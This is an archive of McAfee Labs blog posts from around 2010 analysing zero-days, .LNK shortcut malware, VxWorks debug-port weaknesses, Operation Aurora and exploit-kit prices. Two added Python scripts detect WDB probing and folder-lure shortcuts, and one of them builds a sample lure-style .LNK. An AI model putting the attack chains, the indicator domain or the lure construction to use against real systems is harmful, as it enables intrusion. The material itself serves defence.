Archive for the 'Exploit Research' Category

Adobe PDF Zero-Day Exploit Discovered in the Wild

Just after Adobe released their Out of Band patch for CVE-2010-2862, we discovered malware exploiting a new 0-day vulnerability in the wild. Similar to the iOS PDF jailbreak vulnerability and CVE-2010-2862, this 0day vulnerability also occurs while Adobe Reader is parsing TrueType Fonts. We’ve analyzed and confirmed that the vulnerability affects the latest Adobe Reader (v9.3.4).

This 0day vulnerability is a typical stack buffer overflow vulnerability and exploitation of this issue is expected to be relatively easy. Although the latest version of Adobe Reader has been compiled with stack protection (/GS), the exploit uses a Return Oriented Programming (ROP) technique to bypass /GS protection and DEP.

We saw a similar technique used to exploit an older Adobe TIFF parsing vulnerability. All this seems to point to the fact that ROP is gaining wider acceptance by malware writers to bypass DEP and existing stack protections.

McAfee Labs is coordinating with Adobe PSIRT currently and we’ve provided them with additional details on the bug. The Adobe team is actively working on this issue. There is no patch available at the time of writing this blog. Adobe Acrobat users are urged to update their security definitions for the various products.

McAfee protection to date:

  • McAfee Network Security Platform: Coverage provided under the signature 0x40293c00, UDS-HTTP: Adobe Reader Unspecified Buffer Overflow
  • DAT files: Coverage for known exploits provided in the 6099 DAT release under the signature Exploit-PDF.ps.gen
  • Host IPS: Generic Buffer Overflow protection provides partial coverage
  • FoundStone: The FSL package of September 8 includes a vulnerability check to assess if your systems are at risk

Labs Releases Whitepaper on Cooperative Anti-Malware on Endpoint and Gateway

The Anti-Malware engine is a critical and core piece of the McAfee anti-malware solutions. As with any core technology, the engine must be rock-solid stable, fast, and functionally rich.

A new McAfee Labs whitepaper outlines these engine technologies and values, covering both endpoint and gateway uses. Beyond introducing malware detection methodologies, ranging from exact detection to heuristics, and technologies from exploit detection to cloud-based detection, the paper especially outlines McAfee’s approach to Cooperative Anti-Malware on Endpoint and Gateway. “Cooperative” in this case refers to the added value of combining anti-malware on the endpoint and on the gateway: a true defense-in-depth strategy in action.

In this defense-in-depth implementation we have engine technologies that are optimized for the endpoint and the gateway, respectively, and both are connected through our Global Threat Intelligence back-end, or “cloud.” This combination allows strict enforcement and the highest proactive catch rates at the network perimeter, keeping the majority of threats outside of your network, and effectively and accurately protecting the desktops in an enterprise as well.

Download and read it now!

Weaknesses Undermine Wind River’s VxWorks Operating System

Recently US-CERT issued two security bulletins (VU#362332 and VU#840249) about weaknesses in Wind River Systems’ VxWorks embedded operating system. VxWorks is one of the most popular operating systems running on a variety of appliances and devices. Some of these appliances, such as routers and firewalls, are part of an organization’s critical infrastructure. An attacker could fully control vulnerable embedded devices by remotely exploiting these two vulnerabilities.

The first bulletin (VU#362332) covers old and well-known issues (CVE-2005-3715, CVE-2005-3804, CVE-2006-0374) in the VxWorks WDB debugging interface. WDB connects host tools to a VxWorks system during development, and it is enabled by default. The vulnerability allows unsolicited requests to access WDB without authentication, using the Sun RPC protocol over UDP port 17185.

The second bulletin (VU#840249) addresses exploits that target the self-designed hashing algorithm VxWorks uses to store passwords. The standard VxWorks hashing algorithm is susceptible to hash collision attacks, which allow attackers to brute-force a password in a relatively short time.

Combining these weaknesses and exploiting them together, an attacker can fully compromise the device. Here is an example of a typical exploit: First, an attacker can scan for an embedded device with the VxWorks WDB debug service enabled by exploiting the unauthenticated access vulnerability detailed in VU#362332. Once the device is found, an attacker can use the debug interface to find the username and password information stored on the device. Using that information, the attacker can then brute-force the password offline by exploiting the second weakness (VU#840249).

Today, McAfee NSP released a UDS (0x40805600 / UDS-RPC: Wind River Systems VxWorks WDB Debug Activities Detected) that provides coverage for CVE-2005-3715, CVE-2005-3804, CVE-2006-0374, and VU#362332. Please note that it is normal for embedded platforms to have remote debugging enabled in a development environment. VxWorks WDB debug activity may be legitimate; if that is the case, you can ignore the alerts. However, if you see attempts from unknown or unexpected IP addresses, we recommend investigating the activity and taking further action if required.
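As an added example, not code from the post, the script below triages WDB alerts the way the post suggests: traffic to UDP/17185 from an expected development network is treated as legitimate, anything else is flagged for investigation, and one source touching several devices is marked as a sweep (the scanning step described above). The flow records, the 10.20.0.0/24 development subnet and the sweep threshold are constructed assumptions.

```python
"""Triage VxWorks WDB (Sun RPC over UDP/17185) alerts: expected dev hosts vs. unknown sources."""
import ipaddress
from collections import defaultdict

WDB_PORT = 17185
# Networks where remote debugging of embedded targets is expected (assumed lab subnet, not from the post).
DEV_NETWORKS = [ipaddress.ip_network("10.20.0.0/24")]
# One source touching this many distinct devices on 17185 looks like a scan for WDB-enabled hosts.
SWEEP_THRESHOLD = 4

# Constructed firewall-style flow records (not real logs); key=value fields, one record per line.
SAMPLE_LOG = """\
2010-08-03T10:01:12 proto=udp src=10.20.0.15 dst=10.30.1.7 dport=17185 action=allow
2010-08-03T10:01:13 proto=udp src=10.20.0.15 dst=10.30.1.7 dport=17185 action=allow
2010-08-03T10:02:40 proto=tcp src=10.20.0.15 dst=10.30.1.7 dport=23 action=allow
2010-08-03T10:05:02 proto=udp src=192.0.2.44 dst=10.30.1.1 dport=17185 action=allow
2010-08-03T10:05:02 proto=udp src=192.0.2.44 dst=10.30.1.2 dport=17185 action=allow
2010-08-03T10:05:03 proto=udp src=192.0.2.44 dst=10.30.1.3 dport=17185 action=allow
2010-08-03T10:05:03 proto=udp src=192.0.2.44 dst=10.30.1.4 dport=17185 action=allow
2010-08-03T10:05:04 proto=udp src=192.0.2.44 dst=10.30.1.5 dport=17185 action=allow
2010-08-03T10:09:31 proto=udp src=198.51.100.9 dst=10.30.1.7 dport=17185 action=allow
2010-08-03T10:09:31 proto=udp src=198.51.100.9 dst=10.30.1.7 dport=17185 action=allow
"""


def parse_record(line):
    """Turn 'ts k=v k=v ...' into a dict; returns None for malformed lines."""
    parts = line.split()
    if len(parts) < 2:
        return None
    rec = {"ts": parts[0]}
    for field in parts[1:]:
        key, sep, value = field.partition("=")
        if not sep:
            return None
        rec[key] = value
    return rec


def wdb_flows(log_text):
    """Yield (src, dst) pairs for UDP traffic to the WDB port; everything else is ignored."""
    for line in log_text.splitlines():
        rec = parse_record(line)
        if not rec or rec.get("proto") != "udp" or rec.get("dport") != str(WDB_PORT):
            continue
        yield rec["src"], rec["dst"]


def is_dev_host(ip):
    """True when the source belongs to a network where WDB use is expected."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in DEV_NETWORKS)


def triage(log_text):
    """Classify each source that talked to WDB as 'legitimate', 'investigate' or 'sweep'."""
    targets = defaultdict(set)
    for src, dst in wdb_flows(log_text):
        targets[src].add(dst)
    verdicts = {}
    for src, dsts in targets.items():
        if is_dev_host(src):
            verdicts[src] = "legitimate"
        elif len(dsts) >= SWEEP_THRESHOLD:
            verdicts[src] = "sweep"          # one outside source probing many devices
        else:
            verdicts[src] = "investigate"    # unexpected source, but no sweep pattern yet
    return verdicts


if __name__ == "__main__":
    for src, verdict in sorted(triage(SAMPLE_LOG).items()):
        print(f"{src:15} {verdict}")
```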

Downloader-CJX Cashing In on Microsoft .LNK Flaw

As McAfee Labs predicted in a previous blog post regarding the Microsoft Windows Shell .LNK vulnerability, it was just a matter of time before malware started using Exploit-CVE2010-2568 to take advantage of this new Microsoft zero-day flaw. The flaw is described in CVE-2010-2568.

First, there was talk about PWS-Zbot (a.k.a. Zeus) using the vulnerability in encrypted emails that contained the malicious .LNK file(s); then our research team found a new variant of Downloader-CJX that extended its previous .LNK propagation strategy using social engineering with the new Exploit-CVE2010-2568 .LNK files.

Downloader-CJX is a malware family that installs .LNK files mimicking current Windows and user folders such as Music, Documents, or New Folder. The malware changes the attributes of the real folder to hide it from Explorer, and drops the .LNK files with folder icons, so the user is lured into clicking on these malicious links that appear as legitimate folders. These .LNK files are detected as Downloader-CJX!lnk when found in an infected machine.

The new variant drops additional files on infected systems:

Downloader-CJX.gen.g files

The file x.exe is another copy of Downloader-CJX that in turn drops xxx.dll, a DLL component of Downloader-CJX.

The additional .LNK files exploit the CVE-2010-2568 vulnerability, enabling the malware to load the DLL file when users browse the folder.

These .LNK files are already detected as Exploit-CVE-2010-2568 and the new Downloader-CJX variant as Downloader-CJX.gen.g.

We offer you yet another reminder to keep your anti-malware software updated with the latest DATs, because the bad guys are always updating their software, too.

Microsoft Zero-Day: Malformed Shortcut Vulnerability

Today Microsoft updated the security advisory that was initially published last Friday (July 16), stating that they’re working on issuing a security patch for this vulnerability. Earlier, malware exploiting this issue was found in the wild. Researchers at McAfee Labs have been busy tracking this issue over the weekend and we have come up with some more quick Q&A’s.

1. What is the issue with .LNK files and how can it be exploited?
A. McAfee Labs researchers analyzed malware that was exploiting a design flaw in parsing shortcut (.LNK) files. This issue gets triggered because the Windows Shell component does not validate parameters sent out in the shortcut. This issue can be exploited via any mechanism that makes the user load the icon of the .LNK file.

2. Does the malware need a payload (shellcode) to exploit this flaw?
A. Since this is a design issue in the way shortcuts are parsed, no malicious payload (shellcode) is required to exploit this flaw. The .LNK file needs to point to a malicious file, the path of which needs to be hardcoded in the shortcut.

3. What are the requirements to successfully exploit this flaw?
A. This flaw can be triggered when Windows Explorer or Internet Explorer tries to render a malformed .LNK file that points to a malicious executable. The user need not double-click on the .LNK file to trigger the vulnerability; just opening the folder containing the malicious shortcut is enough to get infected.

4. What are the most likely attack vectors used to exploit this vulnerability?
A. USB drives are likely to be affected the most. The malware discovered in the wild was exploiting this issue via a USB drive. File sharing over SMB is another likely vector to exploit this flaw and this can lead to widespread malware infections over internal networks. WebDAV shares are equally susceptible to exploitation.

5. What are the affected platforms?
A. Microsoft has acknowledged that all supported platforms are affected. More details are available in the Microsoft security advisory. Windows XP SP2 is not in Microsoft’s list of affected platforms, so there is a chance that Windows XP SP2 users might remain vulnerable.

6. How widely is the issue being exploited?
A. The issue is known to be exploited by malware in the wild. Initial attacks were limited. However, an exploit module for Metasploit was published today that uses WebDAV shares as an exploit vector. We expect wider exploitation of this issue. Users should keep their anti-virus software updated with the latest DATs (signatures).

We’ll keep our readers updated on this issue as we analyze more malware and techniques used by malware writers to exploit this flaw.
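As an added example (not code from the McAfee posts), the triage below parses the Windows Shell Link (.LNK) format and flags the folder-lure pattern from the Downloader-CJX post and this Q&A: a shortcut that points at an executable or DLL yet borrows a stock icon from a system icon library. The build_lnk helper constructs sample shortcuts for the demo; the icon-library list and the heuristic itself are assumptions, not McAfee detection logic.

```python
"""Parse Windows Shell Link (.LNK) files and flag the folder-lure pattern described above."""
import struct
from dataclasses import dataclass

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046

# LinkFlags bits we need (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_IDLIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
VOLUME_ID_AND_LOCAL_BASE_PATH = 0x01  # LinkInfoFlags bit (MS-SHLLINK 2.3)

# Assumption: system libraries that hold the stock folder icons a lure borrows from.
SYSTEM_ICON_LIBS = ("shell32.dll", "imageres.dll")
CODE_EXTENSIONS = (".exe", ".dll", ".scr", ".cpl", ".com")


@dataclass
class Shortcut:
    target: str          # LocalBasePath + CommonPathSuffix from LinkInfo ("" if absent)
    relative_path: str
    icon_location: str
    icon_index: int


def parse_lnk(data: bytes) -> Shortcut:
    """Walk ShellLinkHeader, LinkTargetIDList, LinkInfo and StringData in order."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    icon_index = struct.unpack_from("<i", data, 56)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_IDLIST:  # skip the item ID list; we only need the paths
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    target = ""
    if flags & HAS_LINK_INFO:
        li_size, _hdr, li_flags, _vol, base_off, _net, suffix_off = struct.unpack_from("<7I", data, pos)
        def cstr(off):  # NUL-terminated ANSI string, offset relative to the LinkInfo start
            end = data.index(b"\x00", pos + off)
            return data[pos + off:end].decode("cp1252")
        if li_flags & VOLUME_ID_AND_LOCAL_BASE_PATH:
            target = cstr(base_off) + cstr(suffix_off)
        pos += li_size
    def string_data():  # CountCharacters followed by the characters, no terminator
        nonlocal pos
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        return raw.decode("utf-16-le" if width == 2 else "cp1252")
    fields = {}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
                       (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location")):
        fields[name] = string_data() if flags & flag else ""
    return Shortcut(target, fields["relative_path"], fields["icon_location"], icon_index)


def looks_like_folder_lure(s: Shortcut) -> bool:
    """Heuristic: the shortcut runs code but dresses itself up with a stock icon from a system
    icon library, which is how the CJX .LNK files pose as Music, Documents or New Folder."""
    target = (s.target or s.relative_path).lower()
    return target.endswith(CODE_EXTENSIONS) and s.icon_location.lower().endswith(SYSTEM_ICON_LIBS)


def build_lnk(target: str, icon_location: str = "", icon_index: int = 0, relative_path: str = "") -> bytes:
    """Construct a minimal, spec-shaped .LNK for testing (sample data, not a real malware file)."""
    flags = HAS_LINK_INFO | IS_UNICODE
    flags |= HAS_RELATIVE_PATH if relative_path else 0
    flags |= HAS_ICON_LOCATION if icon_location else 0
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0, 0,
                         icon_index, 1, 0, 0, 0, 0)
    volume_id = struct.pack("<4I", 0x11, 3, 0, 0x10) + b"\x00"  # DRIVE_FIXED, empty label
    base_path = target.encode("cp1252") + b"\x00"
    suffix = b"\x00"  # empty CommonPathSuffix
    vol_off = 0x1C
    base_off = vol_off + len(volume_id)
    suffix_off = base_off + len(base_path)
    li_size = suffix_off + len(suffix)
    link_info = struct.pack("<7I", li_size, 0x1C, VOLUME_ID_AND_LOCAL_BASE_PATH,
                            vol_off, base_off, 0, suffix_off) + volume_id + base_path + suffix
    def sd(s):  # StringData entry: CountCharacters + UTF-16LE characters
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    strings = (sd(relative_path) if relative_path else b"") + (sd(icon_location) if icon_location else b"")
    return header + link_info + strings + b"\x00\x00\x00\x00"  # TerminalBlock


if __name__ == "__main__":
    samples = {
        "lure": build_lnk(r"C:\Users\alice\Music\x.exe", r"%SystemRoot%\system32\shell32.dll", 3, r".\x.exe"),
        "editor": build_lnk(r"C:\Program Files\Editor\editor.exe"),
        "folder": build_lnk(r"C:\Users\alice\Music", r"%SystemRoot%\system32\shell32.dll", 3),
    }
    for label, blob in samples.items():
        info = parse_lnk(blob)
        print(f"{label:7} -> {info.target!r:40} icon={info.icon_location!r} lure={looks_like_folder_lure(info)}")
```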

Message to Google: Aurora NOT a Technology or OS Issue

The news that Google is supposedly dropping Microsoft Windows is spreading like wildfire all over the Internet today. Without getting into any “which OS is better or more secure” holy war, let’s review some facts to see if this “decision” has any basis in reality. (I caution readers to remember this is not confirmed, even if it is true.)

The supposed cause of this change is Operation Aurora, the attack that affected Google and many other companies. From the McAfee Labs Threat Center:

“Operation Aurora was a coordinated attack which included a piece of computer code that exploits the Microsoft Internet Explorer vulnerability to gain access to computer systems. This exploit is then extended to download and activate malware within the systems. The attack, which was initiated surreptitiously when targeted users accessed a malicious web page (likely because they believed it to be reputable), ultimately connected those computer systems to a remote server. That connection was used to steal company intellectual property and, according to Google, additionally gain access to user accounts.”

What many people fail to realize is that Operation Aurora was not really about any technical issues.

But you may ask “Marcus, how can you possibly say that? Have you gone mad? Aurora 0wned multiple computers on multiple networks! They were all running that evil Microsoft Windows. Surely removing Windows will solve all the problems!”

These objections are not even close to the real issue. Sure, the attackers used a very effective zero-day vulnerability. And, certainly, they used lots of evasion techniques in delivering the payload. But the real vulnerability has not been discussed.

People were the weak link.

The attackers who launched Operation Aurora knew their targets well from both corporate and personal viewpoints. They knew what their victims were running and what their roles were. The attackers even knew what application versions they used. (Ever wonder why the zero-day was limited in effectiveness to Internet Explorer Version 6 when the attack commenced? The attackers knew that was all they needed.)

The intel that the attackers gathered to make Operation Aurora work is what made it a success–not the operating system involved. The targets were the people.

Would it make any difference if the victims were running Linux or any other operating system if an attacker builds such a sophisticated profile? Not remotely. Linux, Windows, Mac, whatever–everything has weaknesses. Especially the users of those systems.

When an attacker knows the details of a company’s technical deployment and personnel to the level we saw in Operation Aurora, the difference between one operating system and another is irrelevant. Any system or network can be technically compromised. Likewise, malware can be written for any operating system.

If determined attackers and gatherers of intelligence invest the time to get to know their targets–their behaviors, likes, dislikes, technical backgrounds, job roles, etc.–the actual exploit is trivial. All they have to do is get their victims to click a link. The more they know about their targets, the more likely users will click it.

Social engineering and intelligence gathering trump technology every time. They always have and always will.

An Overview of Exploit Packs

Today’s cybercriminals frequently use “exploit packs” to easily snare victims for their botnets. Users with underprotected computers who visit booby-trapped websites become the latest botnet zombies. I often receive requests asking me which exploit packs are current and which vulnerabilities they use.

To answer these inquiries, I’ve created a table that lists the exploits referenced by their Common Vulnerabilities & Exposures (CVE) names and their related kits.

Looking at this table, we can see that the most up-to-date kit is Crimepack.
Version 3.0 alpha is in the wild. In March 2010, Version 2.2.1 was offered for $400.

Next is the Phoenix Exploit Kit. Its price was around $400 in November 2009.

The Eleonore exploit pack is another popular tool. It was recently in the news after the hack of the United States Treasury website. In February 2010, Version 1.3.2 sold for $1,200. In July 2009, the Version 1.2 went for $700 plus $50 for an encrypter. For $1,500, buyers received a version allowing them to manage the tool through their own domains.

Next we have Fragus ($800), Yes Exploit Kit, and Siberia. In April 2010, the Yes Exploit Kit Standard Edition sold for $900. For an additional $250, buyers could include an “abuse-immunity” Virtual Private Server for one month and two “abuse-immunity” domains.

In the final four columns you’ll find the oldest common tools, offered from 2006 to 2008: El Fiesta, Icepack, MPack, and WebAttacker.

Ending XP Service Pack 2 and Windows 2000 security support and its implications

I was just reading Byron Acohido’s writeup on Microsoft ending security patch support for Windows XP Service Pack 2 and Windows 2000. As I work for a vendor myself, I completely understand why Microsoft is going EOL (or is it EOS for end-of-support?? I forget…) for these operating systems – better, more robust OS choices exist, and no company has unlimited resources to support applications and technologies that have seen better days.

I get that, I really do. I do, however, think some larger issues certainly loom:

1. Legacy applications that will not run on higher patch builds
2. Point-of-Sale and embedded devices (think ATMs and such…), ESPECIALLY if you have a global deployment
3. Patching and upgrading is never easy anyway
4. The agility of cybercriminals

Now I will also concede that it’s relatively straightforward to compromise a fully patched system. The tools and techniques are readily and easily available if you have a browser and even limited Google search skills – but let’s also be honest: it’s WAY easier to own an older unpatched build, especially when all the vulnerabilities that XP Service Pack 2 and Windows 2000 have are so well documented and available. Malware also tends to be fairly backwards compatible in many cases.

I am not so certain this will cause a great shift in the toolkits or focus of your average malware writer or cybercriminal. I DO think it is an excellent opportunity for scammers, though. Just think of the spam campaigns or link spam possibilities – it’s a great lure.

“MS has stopped support for XP Service Pack 2 click here for low cost upgrades!!!”
“Your machine seems to be running Windows 2000. Click here to upgrade to Windows 7 for a low price.!”

I can see the spam runs, phishing sites and associated fake-av installs now… Be forewarned my friends. And is it just me or is whitelisting and application control looking better and better??

Cybercrime and Hacktivism in the Headlines

All over the world, individuals and many organized crime and mafia groups have found that the Internet can help them make a lot of money. Others are motivated by ideology: Manipulated by or acting in accordance with an ethos, they conduct illegal activities against institutions or individuals they consider the “enemy.” Far removed from the isolated individuals acting simply irresponsibly or for amusement, these two groups constitute the double threat we know today as cybercrime and hacktivism.

Last week we published a new report that looks, in great depth, at this phenomenon. The main goal is to explain how these organized groups have become established and what the extent of their activities is. In the first part of this report, after offering some definitions, we present some of the major participants who simply cannot be ignored. The second part deals with various topics including cybercrime and hacktivism, economics, politics, culture, and others. Each topic is illustrated with examples found in the news. Through other examples, the third part of the document deals with prices and the return on investment criminals can expect.

Chinese, Japanese, and Brazilian Portuguese versions are also available from the McAfee Labs Technical White Papers web page.

Targeted Internet Explorer Zero-Day Attack Announced (CVE-2010-0806)

Earlier today, Microsoft released Security Advisory (981374). This advisory covers CVE-2010-0806, an unpatched vulnerability affecting Internet Explorer versions 6 and 7. This attack appears to be rather targeted at the moment, but as with other unpatched vulnerabilities in the past, this has the potential to explode now that the word is getting out.

McAfee Labs is aware of an attack emanating from the domain topix21century.com (over both http and https). In this attack, vulnerable users are directed to a malicious webpage that downloads and executes a file named notes.exe or svohost.exe (classified as BackDoor-EMN) in drive-by download fashion (visiting the page is enough to get infected). There are multiple variants of this trojan involved. Notes.exe creates two copies of itself in the %temp% directory, and drops a DLL file. This DLL file is injected into Internet Explorer and provides remote access to an attacker.

The backdoor allows an attacker to perform various functions on the compromised system, including uploading & downloading files, executing files, and terminating running processes. Infected systems may attempt to communicate with the domain notes.topix21century.com over https.

File names related to this attack include:

  • 20100307.htm (CVE-2010-0806 exploit)
  • bypasskav.txt (part of exploit obfuscation code)
    • notes.exe (backdoor installer)
      • note.exe (backdoor installer copy)
      • clipsvc.exe (backdoor installer copy)
        • wshipl.dll (backdoor)
      • rsvm.exe (backdoor installer)
        • wshipnotes.dll (backdoor)

Preliminary product coverage is as follows:

  • McAfee DAT files (antivirus): Coverage will be provided for known exploits as Exploit-CVE-2010-0806 and known payloads as BackDoor-EMN in the 5916 DAT files, releasing March 10.
  • McAfee VirusScan Enterprise Buffer Overflow Protection: Generic Buffer Overflow Protection is expected to cover future exploits.
  • McAfee Host Intrusion Prevention: Generic Buffer Overflow Protection is expected to cover future exploits.
  • McAfee Network Security Platform: The sigset releasing March 9 contains coverage under the signature “HTTP: Microsoft Internet Explorer Code Execution Vulnerability”.
  • McAfee Vulnerability Manager: The FSL/MVM package of March 9 includes a vulnerability check to assess if your systems are at risk.
  • McAfee Web Gateway (formerly Webwasher): TrustedSource has coverage for domains and IP addresses that the malware contacts.
  • McAfee Firewall Enterprise (formerly Sidewinder): TrustedSource has coverage for domains and IP addresses that the malware contacts.
  • McAfee SiteAdvisor, SiteAdvisor Plus, SiteAdvisor Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts.

McAfee Labs is investigating this attack further and will continue to monitor any related activity closely.

McAfee Labs Quarterly Threat Report Posted

Today we unveiled our Threats Report for the fourth quarter of 2009. It highlights many of the most significant spam-generating stories in 2009 as well as the rise of political hacktivism in countries such as Poland, Latvia, Denmark, and Switzerland. The report’s findings also reveal that 2009 averaged approximately 135.5 billion spam messages per day; yet spam volume decreased by 24 percent in Q4 compared with Q3.

Spammers piggybacked heavily on leading headlines in 2009, taking advantage of breaking news stories, global tragedies, and other timely events. The Air France plane crash and Michael Jackson’s death were among the top tragedies exploited by spammers last year. McAfee researchers also noted a significant number of 2010 FIFA World Cup-themed phishing scams, Zeus Trojans masked as the CDC and referencing the H1N1 vaccine program, and “get rich quick” scams due to the rise of U.S. unemployment levels.

Politically motivated attacks are on the rise around the world, targeting popular social networking destinations, as seen recently with the Iranian Cyber Army’s political attack aimed at Twitter. The report confirms that the United States is not the sole target, nor is China the sole origin for these types of assaults. Recent political attacks targeted the Polish government, the Copenhagen Climate Conference, and Latvia’s Independence Day.

Malware–including fake security software, attacks on social networks, and AutoRun USB infections–continued to rise significantly last year. Internet-based, Web 2.0-centric attacks and threats on portable storage devices played a huge role in 2009, contributing greatly to the immense increase in threats and demonstrating how the nature of computer threats is evolving over time. Cybercriminals used social networking sites to target a new generation of victims, with Koobface activity increasing considerably during the latter part of 2009. Koobface is now hosted by servers in 46 countries, with the United States, Germany, and Denmark making up the top three hosting locations.

China Overtakes the U.S. as No. 1 Country Producing Zombies

Zombie production in the U.S. dropped significantly, from 13.1 percent in Q3 to 9.5 percent in Q4, making China the top Zombie-producing country at 12 percent. Brazil ranked third, with Russia and Germany rounding out the top five countries. The United States still remains the number one country in spam production, with Brazil and India taking the number two and three spots. Ukraine and Germany joined the list of top 10 countries producing spam for the first time in 2009.

The Geographic Distribution of Web Threats

North America is the worldwide leader in hosting malicious content, with Europe/Middle East/Africa second, followed by Asia/Pacific. In Europe, Germany holds the number one spot, followed by the Netherlands and Italy. China is the chief host for malicious content in Asia, followed by Russia and South Korea. South America is beginning to play a larger role, with Brazil as the top hosting country in that region.

China is the Worldwide Leader in SQL-Injection Attacks

Although SQL-injection attacks originate from a number of countries across the globe, China was by far the number one country hosting these assaults, at 54.4 percent. Due to the growing popularity of Adobe applications, McAfee Labs saw a number of client-targeted attack attempts to exploit Flash and Acrobat reader.

A full copy of the Q4 2009 Threats Report is available here.

“Operation Aurora” Leading to Other Threats

Operation Aurora has received a lot of attention over the past couple of days.  To recap, Google, Adobe, and many other companies were attacked with code exploiting a zero-day vulnerability in Internet Explorer.  Since the announcement of this vulnerability (CVE-2010-0249), exploit code has been made public and already revised into a more usable form.

History tells us that when exploit code targeting an unpatched vulnerability in popular software is released, a slew of attackers are ready, willing, and able to capitalize. What started out as a sophisticated targeted attack is likely to lead to large-scale attacks on vulnerable Microsoft Internet Explorer users. This often takes the form of drive-by download sites serving malware to unsuspecting users, lured by links spammed in email, social networking sites, blogs, and poisoned search engine results.

For more information on this vulnerability, the Operation Aurora attack, and ways to protect your environment see:
More Details on “Operation Aurora”

More Details on “Operation Aurora”

Earlier today, George Kurtz posted an entry, ‘Operation “Aurora” Hit Google, Others’, on McAfee’s Security Insight blog. The purpose of this post is to answer questions about this particular attack and fill in some of the threat flow and McAfee coverage details.

How were systems compromised?
When a user manually loaded or navigated to a malicious web page from a vulnerable Microsoft Windows system, JavaScript code exploited a zero-day vulnerability in Internet Explorer, the Microsoft Internet Explorer DOM Operation Memory Corruption Vulnerability. Microsoft has released Security Advisory (979352) for this vulnerability (CVE-2010-0249).

What was the payload of the exploit?
Once a system was successfully compromised, the exploit was designed to download and run an executable from a site, which has since been taken offline.  That executable installed a remote access Trojan to load at startup.  This Trojan also contacted a remote server.  This allowed remote attackers to view, create, and modify information on the compromised system.

How wide-spread is this attack?
Aurora appears to have been a very concentrated attack on specific targets.  It is not believed to be widespread at this time.

How serious is this vulnerability?
The Microsoft Internet Explorer vulnerability leveraged in this attack allows for remote code execution, but does require user intervention (such as following a hyperlink to a website, or opening an email attachment, etc.). Furthermore, the single exploit known to exist can be thwarted by Data Execution Prevention (DEP), enabled by default in Internet Explorer 8 and optionally in Internet Explorer 7. Microsoft lists the following combinations as vulnerable: Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4, and Internet Explorer 6, Internet Explorer 7 and Internet Explorer 8 on supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

How are McAfee customers protected from this attack?
McAfee DAT files (antivirus): Coverage will be provided for associated malware (as Exploit-Comele, Roarur.dr, and Roarur.dll) in the 5862 DATs, releasing January 15. Partial coverage is provided in the current (5861) DATs for some components as Generic.dx!kwv, Generic Spy.e, Spy-Agent.ey, and Exploit-Comele.

McAfee VirusScan Enterprise Buffer Overflow Protection: Generic Buffer Overflow Protection is expected to cover some, but not all, exploits.

McAfee Host Intrusion Prevention: Generic Buffer Overflow Protection is expected to cover some, but not all, exploits.

McAfee Network Security Platform: The UDS release of January 14 contains the signature “UDS-HTTP: Microsoft Internet Explorer HTML DOM Memory Corruption” which provides coverage.

McAfee Vulnerability Manager: The FSL/MVM package of January 14 includes a vulnerability check to assess if your systems are at risk.

Updated Jan 14
McAfee Web Gateway (formerly Webwasher): TrustedSource has coverage for domains and IP addresses that the malware contacts, and coverage for associated malware was released January 15 (as BehavesLike.JS.Obfuscated.E); proactive coverage existed for some components (as Trojan.Crypt.XDR.Gen).

Updated Jan 16
McAfee Firewall Enterprise (formerly Sidewinder): TrustedSource has coverage for domains and IP addresses that the malware contacts, and coverage for associated malware was released January 15 (as BehavesLike.JS.Obfuscated.E); proactive coverage existed for some components (as Trojan.Crypt.XDR.Gen).

Updated Jan 18
McAfee Network Security Platform: Extended coverage is provided in the January 18 UDS release via the “Microsoft Internet Explorer HTML DOM Memory Corruption III” signature. Coverage was originally provided in the UDS release of January 14.

McAfee Application Control: All versions of McAfee Application Control protect against infection, without updates, and will prevent all versions of the “Aurora” attack witnessed to date.

McAfee Firewall Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts. The embedded McAfee AV scanning engine in Firewall Enterprise version 7.0.1.02 and later provides coverage for supported protocols via standard McAfee DAT updates. Coverage for known exploits and associated malware is provided as Exploit-Comele, Roarur.dr, and Roarur.dll in the 5862 DATs, released January 15.

McAfee SiteAdvisor, SiteAdvisor Plus, SiteAdvisor Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts.

Updated coverage information will be communicated through McAfee Security Advisories:
http://www.mcafee.com/us/threat_center/securityadvisory/signup.aspx

Dragons Everywhere: The 26th Chaos Communication Congress, Part 2

Day 2 and Night 2 of the 26th Chaos Communication Congress is over, so it’s time for a short update on what you are missing here.

This year the Congress is organized as a distributed event: Many local Hacker Spaces have joined the network at Berlin Conference Center, giving access to resources and talks to visitors. Check out the Dragons Everywhere Wiki at 26c3 for more info. And of course there are still the live streams of the talks available.

One highlight was certainly an update of the current debate around the Vorratsdatenspeicherung (“data retention”). CCC-spokesperson Constanze Kurz expects a favorable ruling against the current laws by the highest German court. This may have an EU-wide impact.

At the same time (and thank goodness there were streams available!) was Collin Mulliner’s talk about fuzzing smart phones and some of his (and Charlie Miller’s) findings.

Felix “FX” Lindner changed sides: in a talk covering defense instead of breaking things, he demonstrated the security problems that come with Flash and released Blitzableiter (“lightning rod”), a tool for sandboxing .swf files to prevent a class of Flash exploits. His tool is still a work in progress but looks very promising already.

